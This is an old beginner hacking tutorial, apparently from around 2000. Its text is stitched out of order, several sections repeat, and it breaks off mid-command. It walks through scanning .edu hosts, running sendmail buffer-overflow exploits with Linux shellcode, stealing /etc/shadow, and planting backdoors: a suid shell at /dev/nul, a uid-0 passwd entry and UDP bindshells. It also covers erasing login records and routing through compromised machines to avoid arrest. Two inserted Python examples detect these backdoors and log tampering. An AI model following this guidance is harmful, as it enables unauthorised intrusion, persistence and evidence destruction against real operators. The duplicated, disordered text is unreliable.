"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.
You gotta replace it with the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).
IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
should you continue without their permission, you'd be breaking the law and
i'm not responsible for your craziness in any way!!!
You should now have the shell account, this is the time to use it!
everything i explain in this section, do it through your shell account:
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from.
sh-2.03$
Here is an example of a buffer overflow (that doesn't really exist):
we compile it:
sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$ ./exploit target.edu 25
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! :-) (just kidding)
There are some exploits that don't give you root directly, but a normal shell.
It depends on which luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local overflow (local means it can't overflow
a daemon, only a local program) and compile it.
Remember to avoid uploading it with FTP if you can.
Another kind of exploit is the one that gives you access to the password file.
If a host has got port 23 (telnet) open, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.
sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
Welcome to target.edu
login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$
Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!
The problem here is that it's not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictionary word
or a person's name.
I said some admins are idiots (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that lusers' passwords are mostly easily cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator privileges
with sudo or something.
To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).
Of course, I haven't listed all the exploit kinds that exist, only the most common.
Putting backdoors
~~~~~~~~~~~~~~~~~
Ok, we've rooted the system. Then what?
Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is a LAMER attitude. everyone out there can hack an .edu
box, but they're not shaming them with such things.
Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scientologists, bsa.org, microsoft, etc. Not a bunch of poor educators.
REMEMBER: ask for permission first!
No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)
Once we type "exit" on our login shell, we're out. And we gotta repeat the whole process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.
So now we're root and we can do everything, we shall put some backdoors that let us get back in.
It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)
Anyway, i'll explain the basics of it.
1.How to make a sushi:
To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
permissions:
sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find anything unusual because
/dev/null does exist (who notices the difference?).
sh-2.03$ cd /dev
sh-2.03$ chown root nul
It should already be root-owned, but anyway...
sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.
We've finished our 'duty', let's logout:
sh-2.03$ exit
Then, when we come back some day:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
We're superluser again!
There's one problem: nowadays most shells drop suid permissions, so the sushi doesn't work.
we'd then upload the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms either! Remember to compile it for the architecture of the target box.
Do you know where to get sash from? From my site :-). (www.3b0x.com)
2.How to add fake lusers.
You gotta manipulate the users file: /etc/passwd
try this:
sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.
This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell
When uid=0 and gid=0, that luser gets superluser priviledges.
Then we add a line like this:
dood::0:0:dood:/:/bin/sh (put it in a hidden place)
So, once we get a shell, we type:
sh-2.03$ su dood
sh-2.03$ whoami
dood
And now we're root because dood's uid=0 and gid=0.
Smart admins usually look for anomalies in /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.
I haven't got such a program on my site, but it shouldn't be difficult to develop.
3.How to put a bindshell.
A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The point is that this is our own daemon. The good bindshells will listen on a UDP port (not TCP)
and give a shell to you when you connect. The cool thing about UDP is this:
If the admin uses a scanner to see what TCP ports are open, he wouldn't find anything!
They rarely remember UDP exists.
You can get a UDP bindshell coded by !hispahack from my site.
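The first two backdoors above leave artifacts that a routine audit finds. The following is an added example, not part of the original tutorial: it flags extra uid-0 or passwordless entries in passwd data and setuid or plain regular files inside a device directory. The function names and the sample passwd text are constructed for illustration.

```python
import os
import stat

# Constructed sample in the real seven-field passwd layout
# (name:passwd:uid:gid:gecos:home:shell); line 3 is the entry from the text.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
luser:x:1001:100:Some User:/home/luser:/bin/sh
dood::0:0:dood:/:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""


def audit_passwd(text):
    """Return (line_no, account, finding) for suspicious passwd entries."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry"))
            continue
        name, passwd, uid = fields[0], fields[1], fields[2]
        if not uid.isdigit():
            findings.append((line_no, name, "non-numeric uid"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((line_no, name, "uid 0 on a non-root account"))
        if passwd == "":
            findings.append((line_no, name, "empty password field"))
    return findings


def classify_mode(mode, in_device_dir):
    """Findings for one file mode; device nodes and symlinks are ignored."""
    findings = []
    if stat.S_ISREG(mode):
        if mode & stat.S_ISUID:
            findings.append("setuid regular file")
        if in_device_dir:
            findings.append("regular file in device directory")
    return findings


def same_filesystem(path, device):
    """True when path lives on the given device number."""
    try:
        return os.lstat(path).st_dev == device
    except OSError:
        return False


def scan_tree(root, device_dir=False):
    """Walk one filesystem (like find -xdev) and collect findings.

    With device_dir=True every regular file is reported, because a device
    directory should hold device nodes, links and directories only. Mounted
    sub-trees such as /dev/shm are skipped since they sit on another device.
    """
    results = []
    root_device = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if same_filesystem(os.path.join(dirpath, d), root_device)]
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry
            for finding in classify_mode(st.st_mode, device_dir):
                results.append((path, st.st_uid,
                                oct(stat.S_IMODE(st.st_mode)), finding))
    return results


if __name__ == "__main__":
    for hit in audit_passwd(SAMPLE_PASSWD):
        print("passwd:", hit)
    if os.path.isdir("/dev"):
        for hit in scan_tree("/dev", device_dir=True):
            print("dev:", hit)
```

Run `scan_tree("/")` as well for the general setuid inventory and compare it against a known-good baseline; a UDP listener such as the one in item 3 needs a separate check of listening sockets.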
Cleaning up
~~~~~~~~~~~
Remember when we logged in to target.edu as luser, and used su to become root?
Take a look at this line:
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
Yes, that was displayed by the target box when we logged in there.
It refers to the last login that the real luser did.
So, what will be displayed when luser logs in again?
Last login: Sun Sep 24 10:32:14 from.
Then luser writes a mail to the admin:
"Some strange thing has happened, when I logged in today, I read a line like this:
Last login: Sun Sep 24 10:32:14 from.
Does it mean I did login yesterday? It can't be, I don't work on sundays!
I think it's a bug and this is your fault."
The admin responds to luser:
"That wasn't a bug! this line means someone accessed the system using your password, don't
worry about that, we got his IP. That means we can ask his ISP what phone number did call
at 10:32 and get. Then we shall call the police and he'll get busted"
So you'll get busted because luser was a bit clever (sometimes happens).
So we gotta find a way to delete that.
This information can be stored in:
/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog
and we can erase it using lled (get it from my site)
lled has got a built-in help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.
There is also some information we'd like to erase:
Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its syntax is very similar to lled.
you can get it from my site.
The who command shows us (and the admin) which lusers are logged in at the moment.
What if we login and the admin is there?
sh-2.03$ who
root tty1 Sep 25 18:18
Then we shall use zap2. If you logged in as 'luser', then type:
sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$
And luser has never been here.
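Edits to lastlog and wtmp tend to leave the two files disagreeing with each other. The following is an added example, not part of the original tutorial: it scans a wtmp image for blanked slots and backward timestamps, then cross-checks lastlog against wtmp. The Linux/glibc record layouts, the helper names and the sample data are assumptions; the page does not say how lled, wted or zap2 change the files.

```python
import struct

# Assumed layouts: Linux/glibc little-endian "struct utmp" (384 bytes) and
# "struct lastlog" (292 bytes, one slot per uid). Other systems differ.
UTMP = struct.Struct("<hxxi32s4s32s256shhiii4i20x")
LASTLOG = struct.Struct("<i32s256s")
USER_PROCESS = 7  # ut_type of a login record


def cstr(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def utmp_record(ut_type, pid, line, user, host, when):
    """Pack one wtmp record (used here only to build the sample)."""
    return UTMP.pack(ut_type, pid, line.encode(), b"", user.encode(),
                     host.encode(), 0, 0, 0, when, 0, 0, 0, 0, 0)


def wtmp_anomalies(data):
    """Return (record_index, finding) leads for a raw wtmp image."""
    findings = []
    count, leftover = divmod(len(data), UTMP.size)
    last_time = None
    for index in range(count):
        raw = data[index * UTMP.size:(index + 1) * UTMP.size]
        if not any(raw):
            # Assumption: an in-place cleaner blanks the slot instead of
            # shrinking the file, which leaves 384 zero bytes behind.
            findings.append((index, "zeroed record"))
            continue
        when = UTMP.unpack(raw)[9]  # tv_sec
        if last_time is not None and when < last_time:
            findings.append((index, "timestamp goes backwards"))
        last_time = when
    if leftover:
        findings.append((count, "truncated trailing record"))
    return findings


def newest_logins(data):
    """Map user -> tv_sec of the newest USER_PROCESS record."""
    newest = {}
    for index in range(len(data) // UTMP.size):
        rec = UTMP.unpack_from(data, index * UTMP.size)
        if rec[0] == USER_PROCESS:
            user = cstr(rec[4])
            newest[user] = max(newest.get(user, 0), rec[9])
    return newest


def lastlog_mismatches(lastlog, wtmp, uid_to_user, slack=2):
    """Return (user, lastlog_time, wtmp_time) where the two files disagree.

    wtmp is rotated, so lastlog times older than the first surviving wtmp
    record are skipped; clock changes can also cause hits, so treat every
    result as a lead to investigate, not as proof.
    """
    times = [UTMP.unpack_from(wtmp, i * UTMP.size)[9]
             for i in range(len(wtmp) // UTMP.size)]
    window_start = min((t for t in times if t), default=0)
    newest = newest_logins(wtmp)
    findings = []
    for uid, user in sorted(uid_to_user.items()):
        offset = uid * LASTLOG.size
        if offset + LASTLOG.size > len(lastlog):
            continue  # no slot: this uid never logged in
        ll_time = LASTLOG.unpack_from(lastlog, offset)[0]
        if not ll_time or ll_time < window_start:
            continue
        if abs(ll_time - newest.get(user, 0)) > slack:
            findings.append((user, ll_time, newest.get(user, 0)))
    return findings


def build_sample():
    """Constructed data: luser's second login was blanked out of wtmp only."""
    wtmp = (utmp_record(USER_PROCESS, 411, "pts/0", "luser",
                        "192.0.2.10", 969800000)
            + bytes(UTMP.size)
            + utmp_record(USER_PROCESS, 502, "tty1", "root", "", 969900000))
    lastlog = bytearray(LASTLOG.size * 1002)
    LASTLOG.pack_into(lastlog, 0, 969900000, b"tty1", b"")
    LASTLOG.pack_into(lastlog, 1001 * LASTLOG.size, 969850000,
                      b"pts/1", b"192.0.2.10")
    return wtmp, bytes(lastlog), {0: "root", 1001: "luser"}


if __name__ == "__main__":
    sample_wtmp, sample_lastlog, users = build_sample()
    print(wtmp_anomalies(sample_wtmp))
    print(lastlog_mismatches(sample_lastlog, sample_wtmp, users))
```

Shipping both files to a remote log host as they are written makes the comparison reliable even when the local copies have been altered.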
Greetings
~~~~~~~~~
Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you
decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)
for more advanced tutorials so you can improve your skills.
I'd be very happy if you sent me a mail telling me your impression of this paper (whether
it's good or bad), and helped me to improve it.
I'd like to send my greetings to every hacker that has taught me in any way, through newsgroups
or other tutorials like this one. thanks to all.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction
~~~~~~~~~~~~
Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've
met. I want to write this because most tutorials i've found (very good tutorials) are now
old and don't fit just like they did before. This is why i'm going to teach you and show you
the way to learn to hack.
If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.
I'm sure you'll find a lot of bad grammar. Don't report it cause I'm not english and
i don't care at all as long as it's understandable.
In this document I talk about many security tools, you can find all of them and also contact
me on my site: www.3b0x.com
When you finish reading it, please TELL ME how you like it!
I want to make newer versions of it, check on my site to stay informed.
COPYING: You're welcome to distribute this document to whoever the hell you want, post it
on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
If you want to perform it, ask me for permission. thanks a lot!
DISCLAIMER: This document is intended for recreational or educational purposes. I don't want to
promote computer crime and I'm not responsible for your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.
Let's start
~~~~~~~~~~~
If you read carefully everything i'm telling you here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.
NOTE: If you've been unlucky, and before you found this document, you've read the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.
Some definitions
~~~~~~~~~~~~~~~~
I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.
The systems we're going to hack (with permission) are full of normal users, who
don't have the remotest idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.
I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.
Operating Systems
~~~~~~~~~~~~~~~~~
Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.
You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:
-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimum knowledge of a UNIX system, and what's better
than running it at home?
-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.
Let's see where to find the unix you're interested in.
The UNIX systems may be divided into two main groups:
- commercial UNIXes
- free opensource UNIXes
A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.
The free opensource UNIXes can also be divided into:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.
- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.
I strongly suggest you to get the SuSE distribution of Linux.
It's the best one in my opinion, and i added here some tips for SuSE, so all should be easier.
Visit www.suse.de and look for a local store or order it online.
(i know i said the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)
If you own an intel box, then order the PC version.
If you own a mac box, then order the PowerPC version.
Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.
It's possible you'll have problems with your hardware during the installation. Read the manual, ask
for technical support or buy new hardware, just install it however you can.
This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.
If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.
the Internet
~~~~~~~~~~~~
Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.
Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.
You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).
Common problems:
If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).
Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem lacks a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And that vendor driver is only available for windoze.
ISA and external modems are more probably real modems, but not all of them.
If you want to make sure whether a modem is a winmodem or not, visit http://start.at/modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)
NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect to the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.
Don't get busted
~~~~~~~~~~~~~~~~
Let's suppose you haven't skipped everything above and your Linux box is now connected to the net.
Now it's the turn of STEALTH. You won't get busted! just follow my advice and you'll be safe.
- Don't hack
this is the most effective stealth technique. not even the FBI can bust you. :-)
If you choose this option, stop reading now, cause the rest is worthless and futile.
- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website or email address, find your ISP, your phone number, your home...
and you get busted!!
- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.
- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).
Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.
- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes
- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)
- Use phreaking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.
TCP ports and scanning
~~~~~~~~~~~~~~~~~~~~~~
Have you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?
Then we shall start with the damn real thing.
First of all, you should know some things about the internet. It's based on the TCP/IP protocol
(and others).
It works like this: every box has 65k connection PORTS. some of them are open and waiting for
your data to be sent.
So you can open a connection and send data to any of these ports. Those ports are associated with
a service:
Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers its damn service.
here are some common ports and their usual services (there are a lot more):
Port number    Common service    Example daemon (d stands for daemon)
21             FTP               FTPd
23             Telnet            telnetd
25             SMTP              sendmail (yes!)
80             HTTP              apache
110            POP3              qpop
Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /luser/index.html HTTP/1.1" plus two newlines ('intro' twice)
(it really sends a lot more things, but that is the essential part)
-the host sends the html file
The cool thing of daemons is they have really serious security bugs.
That's why we want to know what daemons are running there, so...
We need to know what ports are opened in the box we want to hack.
How could we get that information?
We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.
The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.
Let's install nmap from an .rpm package.
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
then we run it:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Nmap has told us which ports are opened on target.edu and thus, what services it's offering.
I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.
So let's see what's on those ports.
On your linux console, type:
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.
You see?
They give away some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3
Experiment with other ports to discover other daemons.
Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.
But there is a problem here... such information can be faked!
It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
TCP Sequence Prediction: Class=random positive increments
Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!
We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.
This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.
Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.
Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:
bash-2.03$ man nmap
How to upload and compile programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The most obvious and simple way is using FTP:
bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
But this is not a really good way. It can create logs that will make the admin to detect us.
Avoid uploading it with FTP as you can, use cut&paste instead.
Here's how to make it:
we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.
Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.
To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.
If cut&paste doesn't work, you can also type it by hand (they aren't usually large).
Once you get the .c file there, here's how to compile:
sh-2.03$ gcc program.c -o program
and execute:
sh-2.03$ ./program
Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.
A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.
When we exploit a security bug, we can get:
- a normal shell (don't know what a shell is? read a book of unix!)
a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.
These are some exploit databases i suggest you to visit:
www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html
Every exploit is different to use, so read its text and try them.
They usually come in .c language.
The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)
Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.
We edit the .c file we've downloaded and look for something like this:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.
You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).
IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
shall you continue without their permission, you'd be inquiring law and
i'm not responible of your craziness in any way!!!
You should have now the shell account, this is the time to use it!
everything i explain on this section, do it through your shell account:
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from
sh-2.03$
Here is a example of a buffer overflow (that doesn't really exist):
we compile it:
sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! :-) (just kidding)
There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.
Remember to avoid uploading it with FTP as you can.
Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.
sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
Welcome to target.edu
login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$
Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!
The problem here is that it is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictionary word
or a person's name.
I said some admins are idiots (some of them are smart), but lusers are the most
idiotic thing on a system. You'll find that lusers' passwords are mostly easily cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator privileges
with sudo or something.
To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).
Of course, I haven't listed all the exploit kinds that exist, only the most common.
Putting backdoors
~~~~~~~~~~~~~~~~~
Ok, we've rooted the system. Then what?
Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is a LAMER attitude. Everyone out there can hack an .edu
box, but they're not shaming them with such things.
Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scientologists, bsa.org, microsoft, etc. Not a bunch of poor educators.
REMEMBER: ask for permission first!
No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)
Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.
So now we're root and we can do everything, we shall put some backdoors that let us get back in.
It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)
Anyway, i'll explain the basics of it.
1. How to make a sushi:
To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
permissions:
sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find anything unusual because
/dev/null does exist (who notices the difference?).
sh-2.03$ cd /dev
sh-2.03$ chown root nul
Should already be root-owned, but anyway...
sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.
We've finished our 'duty', let's logout:
sh-2.03$ exit
Then, when we come back some day:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
